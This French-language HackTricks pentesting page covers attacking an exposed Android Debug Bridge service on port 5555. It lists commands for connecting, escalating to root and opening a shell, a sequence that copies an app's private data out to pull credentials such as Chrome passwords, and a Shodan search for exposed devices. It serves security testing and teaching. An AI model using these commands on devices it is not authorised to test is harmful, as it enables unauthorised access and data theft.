hacktricks/network-services-pentesting/5555-android-debug-bridge.md

Informations de base

Android Debug Bridge (adb) est un outil polyvalent en ligne de commande qui vous permet de communiquer avec un appareil. La commande adb facilite une variété d'actions sur l'appareil, telles que l'installation et le débogage d'applications, et elle fournit un accès à un shell Unix que vous pouvez utiliser pour exécuter une variété de commandes sur un appareil. (à partir de ici)

Port par défaut: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connexion

Si vous trouvez le service ADB en cours d'exécution sur un port d'un appareil et que vous pouvez vous y connecter, vous pouvez obtenir un shell à l'intérieur du système :

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Pour plus de commandes ADB, consultez la page suivante:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Extraction de données d'application

Pour télécharger complètement les données d'une application, vous pouvez :

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Vous pouvez utiliser cette astuce pour récupérer des informations sensibles comme les mots de passe Chrome. Pour plus d'informations à ce sujet, consultez les informations et les références fournies ici.

Shodan

• android debug bridge

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !

• Découvrez The PEASS Family, notre collection exclusive de NFTs

• Obtenez le swag officiel PEASS & HackTricks

• Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.

• Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.